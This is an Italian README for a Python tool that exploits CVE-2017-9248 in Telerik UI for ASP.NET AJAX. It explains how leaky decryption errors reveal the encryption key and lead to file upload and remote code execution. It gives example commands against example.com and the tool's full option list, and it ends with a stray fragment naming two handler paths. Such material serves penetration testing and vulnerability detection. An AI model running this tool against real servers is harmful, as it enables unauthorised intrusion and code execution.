
Un altro strumento per sfruttare CVE-2017-9248, una debolezza crittografica nel gestore di dialoghi di Telerik UI for ASP.NET AJAX.
Un altro strumento per sfruttare CVE-2017-9248, una debolezza crittografica nel dialog handler di Telerik UI for ASP.NET AJAX. Lo sfruttamento consente di accedere a un'utilità di gestione file in grado di caricare file arbitrari, portando di solito a un'esecuzione remota di codice.
La vulnerabilità è causata da una fuga di informazioni tramite messaggi di errore durante la decrittazione dei "DialogParameters" di Telerik, che sono una serie di valori di configurazione cifrati. Questi valori vengono forniti all'utente e poi rimandati al server come input utente. Le informazioni divulgate sul processo di decrittazione consentono la scoperta sistematica della Telerik.Web.UI.DialogParametersEncryptionKey. Per un approfondimento sulla vulnerabilità e sul funzionamento dello strumento, visita il nostro articolo del blog: https://blog.blacklanternsecurity.com/p/yet-another-telerik-ui-revisit.

Lo strumento originale per sfruttare CVE-2017-9248 dp_crypto è stato prezioso per la realizzazione di questo. Per non parlare del fatto che ci ha fruttato un bel po' di RCE nel corso degli anni :)
La ricerca di SR Labs nel loro articolo Achieving Telerik Remote Code Execution 100 Time Faster è stata la base della tecnica usata in questo strumento e ci ha ispirato a crearlo
Esempio (utilizzo base):
python3 dp_cryptomg.py http://example.com/Telerik.Web.UI.DialogHandler.aspx
Esempio (impostazione della lunghezza della chiave personalizzata e uso di un proxy)
python3 dp_cryptomg.py -l 40 -p http://127.0.0.1:8080 http://example.com/Telerik.Web.UI.DialogHandler.aspx
usage: dp_cryptomg.py [-h] [-d] [-c COOKIE] [-k KNOWN_KEY] [-v VERSION] [-l LENGTH] [-p PROXY] [-s] [-S] url
positional arguments:
url The target URL
optional arguments:
-h, --help show this help message and exit
-d, --debug Enable debugging mode
-c COOKIE, --cookie COOKIE
Add optional cookie header to every request
-k KNOWN_KEY, --known-key KNOWN_KEY
The partial or complete known key, in HEX format
-v VERSION, --version VERSION
Specify the Telerik version, if known
-l LENGTH, --length LENGTH
The length of the key, if known
-p PROXY, --proxy PROXY
Optionally set an HTTP proxy
-s, --simple Turn off the fancy interface
-S, --super-simple Turn off the fancy interface and show minimal output
-q, --quick-check Only detect likely vulnerability and skip exploitation (forces simple mode)
Telerik.Web.UI.DialogHandler.aspx che Telerik.Web.UI.SpellCheckHandler.axd